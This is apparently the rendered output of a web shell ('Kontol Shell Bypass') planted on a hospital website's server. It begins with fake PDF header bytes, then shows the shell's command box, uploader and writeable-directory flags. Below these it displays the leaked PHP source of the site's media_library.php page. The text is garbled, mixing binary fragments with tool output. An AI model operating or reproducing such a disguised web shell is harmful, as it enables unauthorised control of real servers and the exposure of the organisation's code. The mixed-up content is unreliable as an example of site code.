%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/application/views/media_library.php
<?php include("includes/header.php"); ?>

<!--BreadcrumbsStart-->
<section id="breadcrumbs">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<h1>Media Library</h1>
			</div>
			<div class="col-md-12">
				<ul>
					<li><a href="/">Sharda Hospital</a></li>
					<li>Media Library</li>
				</ul>
			</div>
		</div>
	</div>
</section>

<section id="main">
	<div class="container">
		<div class="row">
			<div id="media_library">
				<h2 class="h2inner text-center mrg-bot50" id="newsupdates">News & Updates</h2>
				<?php  
				 $i=1;
				 if($i%3==0){?> <div class="col-md-6 col-sm-6 col-xs-12"> </div>  <?php }
				foreach($records  as $rows){ ?>
				<div class="col-md-6 col-sm-6 col-xs-12"> 
                	<div class="news_updates">
                    <ul class="list-unstyled">
                     <li>
								<span><img src="<?php echo base_url();?>images/logo_news.png"></span>
								<h6><?php echo  $date = date('d F Y', strtotime($rows['news_date']));?></h6>
								<a href="<?php echo site_url('news/'.$rows['news_slug']); ?>"><h5><?php echo $rows['news_title'];?></h5></a>
								<?php echo substr($rows['news_description'],0,60);?> <?php echo  $date = date('d F Y', strtotime($rows['news_date']))."....";?>
							</li>
                      				
						</ul>
                         
					</div>
				</div>
				 <?php $i++; } ?>
               
			</div>
		</div>
	</div>
</section>
<!--NewsUpdates-Start-->
				
<!--Gallery-Start-->
<section>
 <div class="container">
        <div class="row">
        <div class="gallery col-lg-12 col-md-12 col-sm-12 col-xs-12">
            <h2 class="h2inner text-center mrg-bot30 mrg-top50">Gallery</h2>
        </div>

        <div class="mrg-bot50 tab_gallery">
			<ul class="list-unstyled">
				<li><a class="filter-button active" data-filter="all" tabindex="1">All</a></li>
				<?php if($categories){
					$i=2;
					foreach($categories as $category){ ?>
						<li>
							<a class="filter-button" data-filter="<?php echo $category['GalleryCategoryName'];?>" tabindex="<?php echo $i; ?>">
							<?php echo $category['GalleryCategoryName']; ?>
							</a>
						</li>
				<?php	
						$i++;
					}
				} ?>
			</ul>
			<div class="clearfix"></div>
			</div>
			

            <div class="tab_gallery2 mrg-bot50">
            	<?php if($albums){
            		foreach($albums as $album){  ?>
            			<div class="gallery_product col-lg-3 col-md-3 col-sm-3 col-xs-12 filter <?php echo $album['GalleryCategoryName']; ?>">
							<div class="img">
								<img src="<?php echo base_url();?>uploads/gallery/<?php echo $album['GalleryAlbumCover'];?>" class="img-responsive">
								<div class="overlay">
									<div class="text">
										<div class="circle"><a href="<?php echo site_url('ImageGallery/album/'.$album['GalleryAlbumID']); ?>"><img src="<?php echo base_url();?>images/icons/plus_gallery.png"></a></div>
										<h6>View more</h6>
									</div>
								</div>
							</div>				
						</div>
            	<?php	}
            	} ?>

				<div class="clearfix"></div>				
				<div class="download_top text-center mrg-top20 mrg-bot30"><a href="<?php echo site_url('ImageGallery'); ?>" class="button">View All</a></div>							
				<div class="clearfix"></div>
			</div>
			
        </div>
    </div>

<script>
$(document).ready(function(){

    $(".filter-button").click(function(){
        var value = $(this).attr('data-filter');
        
        if(value == "all")
        {
            //$('.filter').removeClass('hidden');
            $('.filter').show('1000');
        }
        else
        {
//            $('.filter[filter-item="'+value+'"]').removeClass('hidden');
//            $(".filter").not('.filter[filter-item="'+value+'"]').addClass('hidden');
            $(".filter").not('.'+value).hide('3000');
            $('.filter').filter('.'+value).show('3000');
            
        }
        
        $(".filter-button").removeClass("active");
        $(this).addClass("active");
    });

});
</script>	
	
</section>
<!--Gallery-Start-->

<!--OurLeadership-Start-->
<section id="our_leadership">
	<div class="container">
		<div class="row">
			<div class="col-md-12 text-center">
				<h2>Download Center</h2>
				<p>Sharda Hospital Brochure 2017</p>
				<a href="<?php echo base_url();?>uploads/files/SH_Brochure2017.pdf" class="button">Download brochure here</a>
			</div>
		</div>
	</div>
</section>
<!--OurLeadership-End-->

<!--NewsUpdates-Start-->
<section id="media_library">
	<div class="container">
		<div class="row">
			<div id="media_library">
				<h2 class="h2inner text-center mrg-bot50">Electronic Media Coverage</h2>
				
	<!--			<div class="col-md-6 col-sm-6 col-xs-12">
					<div class="news_updates">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h6>21 Mar 2017</h6>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th....</p>
							</li>
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h6>21 Mar 2017</h6>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th....</p>
							</li>
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h6>21 Mar 2017</h6>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th....</p>
							</li>							
						</ul>
					</div>
				</div>  -->
				
				<div class="col-md-3 col-sm-3 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/sahara_award_news.jpg"></span>
								<h6>8 Apr 2017</h6>
								<h5>Sharda Hospital gets Health and Wellness Award</h5>
								<p>Sharda Hospital was awarded the best Multi-speciality Hospital at Health and Wellness Award 2017...</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">View more</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>
				
				<div class="col-md-3 col-sm-3 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/DainikJagran_CancerDay.jpg"></span>
								<h6>6 Feb 2017</h6>
								<h5>Free Health Check-up camp</h5>
								<p>Free health check-up provided to over 300 patients on the occasion of world Cancer Day at Sharda Hospital...</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">View more</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>
				
				<div class="col-md-3 col-sm-3 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/unnamed.png"></span>
								<h6>11 Jan 2017</h6>
								<h5>Free treatment now extended up till 23 January 2017</h5>
								<p>Sharda Hospital extended the free treatment facility for financially weak patients up till 23 January 2017 ...</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">View more</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>

				<div class="col-md-3 col-sm-3 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/Amar_ujala_Hospital.jpg"></span>
								<h6>17 Dec 2016</h6>
								<h5>Successful Open Heart Surgery</h5>
								<p>Doctors at Sharda Hospital successfully performed Open Heart Surgery on a 15 year old Nigerian by replacing both valves..  </p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">View more</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>			
				
			</div>
		</div>
	</div>
</section>
<!--NewsUpdates-End-->

<!--PatientsSay-Start-->
<section id="patients_say">
	<div class="container">
		<div class="row">
			<div id="media_library">
				<h2 class="h2inner text-center mrg-bot50">what our patients say</h2>
				 <?php foreach($patient_stories as $patient_story){?>
				<div class="col-md-3 col-sm-6 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<h5><?php echo strip_tags($patient_story['PatientStoryTitle']); ?></h5>
								<p><?php echo substr(strip_tags($patient_story['PatientStoryContent']),0,140);?></p>
								<ul class="storybox">
									<li>
										<a href="<?php echo base_url();?>PatientStory/<?php echo $patient_story['PatientStoryPageURL']?>" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">Visit the story</span>
									</li>
								</ul>
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>
				<?php } ?>	
<!--				<div class="col-md-3 col-sm-4 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th.... Week 12th.... Week 12th....</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">Visit the story</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>

				<div class="col-md-3 col-sm-4 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th.... Week 12th.... Week 12th....</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">Visit the story</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>

				<div class="col-md-3 col-sm-4 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th.... Week 12th.... Week 12th....</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">Visit the story</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>

				<div class="col-md-3 col-sm-4 col-xs-12">
					<div class="electronic_media">
						<ul class="list-unstyled">
							<li>
								<span><img src="<?php echo base_url();?>images/media-library/nature_1.jpg"></span>
								<h5>Sharda Hospital gets NABH  accreditation.</h5>
								<p>Sharda Hospital is organizing a free Glaucoma Checkup Camp on the occasion of World Glaucoma Week 12th.... Week 12th.... Week 12th....</p>
								<ul class="storybox">
									<li>
										<a href="" class="hosBtn"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="0.433071in" height="0.298622in" viewBox="0 0 433 299" xmlns:xlink="http://www.w3.org/1999/xlink">
										<path d="M289 7c-9,-9 -24,-9 -34,0 -9,9 -9,24 0,34l86 85 -317 0c-13,0 -24,10 -24,23 0,13 11,24 24,24l317 0 -86 85c-9,9 -9,24 0,34 5,4 11,7 17,7 6,0 13,-3 17,-7l144 -143 -144 -142z"/>
										</svg></a>
										<span class="storyshowhide">Visit the story</span>
									</li>
								</ul>								
							</li>							
						</ul>
						<div class="clearfix"></div>
					</div>
				</div>				-->
				
			</div>
		</div>
	</div>
</section>
<!--PatientsSay-End-->

<!--NotFromIndia-Start-->
<section id="not_from_india">
	<div class="container">
		<div class="row">
			<div class="col-md-12 text-center">
				<h2>Not From India? No Problem.</h2>
				<p>We can help plan your visit.</p>
				<a href="<?php echo site_url('international-patients'); ?>" class="button">Learn more</a>
			</div>
		</div>
	</div>
</section>
<!--NotFromIndia-End-->


<?php include('includes/bottom_boxes.php') ?>

<?php include('includes/quick_links.php') ?>

<?php include('includes/subscribe.php') ?>

<?php include('includes/footer.php'); ?>

Kontol Shell Bypass